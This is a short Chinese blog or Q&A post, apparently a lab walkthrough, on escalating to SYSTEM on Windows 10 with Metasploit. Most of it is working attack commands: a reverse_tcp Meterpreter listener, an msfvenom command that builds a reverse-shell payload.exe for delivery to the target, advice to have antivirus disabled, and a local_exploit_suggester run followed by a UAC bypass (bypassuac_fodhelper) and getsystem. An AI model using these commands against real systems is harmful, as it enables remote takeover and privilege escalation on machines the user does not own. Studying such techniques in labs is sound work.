今天做了一个Win10提权的简单小实验,我们通过Metasploit拿到一个普通权限的账号ailx10
,然后通过local_exploit_suggester
模块,搜索到适用于目标机器的提权模块 bypassuac_fodhelper
,稍微配置一下,直接run
,然后getsystem
就拿到SYSTEM权限了,Windows提权就是这么简单。
ailx10
2001 次咨询
4.9
网络安全优秀回答者
互联网行业 安全攻防员
去(知乎ailx10)咨询
(1)服务端:启动 Metasploit,配置 Listener
- 不推荐用run,因为它是单任务的,推荐使用exploit -j,它是多任务的
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <你的IP地址>
set LPORT <你要监听的端口>
exploit -j
(2)服务端:生成载荷,自己想办法给目标主机投递载荷
- 目标主机需要关闭杀毒软件,会被 Windows Defender 干掉
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<你的IP地址> LPORT=<你要监听的端口> -f exe -o payload.exe
(3)目标主机双击执行载荷,上线,记住 session
(4)getuid 看看自己什么身份,普通身份
(5)进入 local_exploit_suggester
模块,搜索提权点
use post/multi/recon/local_exploit_suggester
(6)找到了如下的提权点
# Name Potentially Vulnerable?
- ---- -----------------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes
2 exploit/windows/local/bypassuac_eventvwr Yes
3 exploit/windows/local/bypassuac_fodhelper Yes
4 exploit/windows/local/bypassuac_sdclt Yes
5 exploit/windows/local/bypassuac_sluihijack Yes
6 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes
7 exploit/windows/local/cve_2020_1048_printerdemon Yes
8 exploit/windows/local/cve_2020_1337_printerdemon Yes
9 exploit/windows/local/cve_2021_40449 Yes
10 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes
11 exploit/windows/local/ms15_078_atmfd_bof Yes
12 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes
13 exploit/windows/local/tokenmagic Yes
(8)一个一个尝试,使用 windows/local/bypassuac_fodhelper
进行提权
- show options 查看需要哪些配置,配置上,然后run一下,试试能不能提权
use windows/local/bypassuac_fodhelper
提权成功,获得SYSTEM最高权限,就是这么简单。
编辑于 2024-09-04 19:18・江苏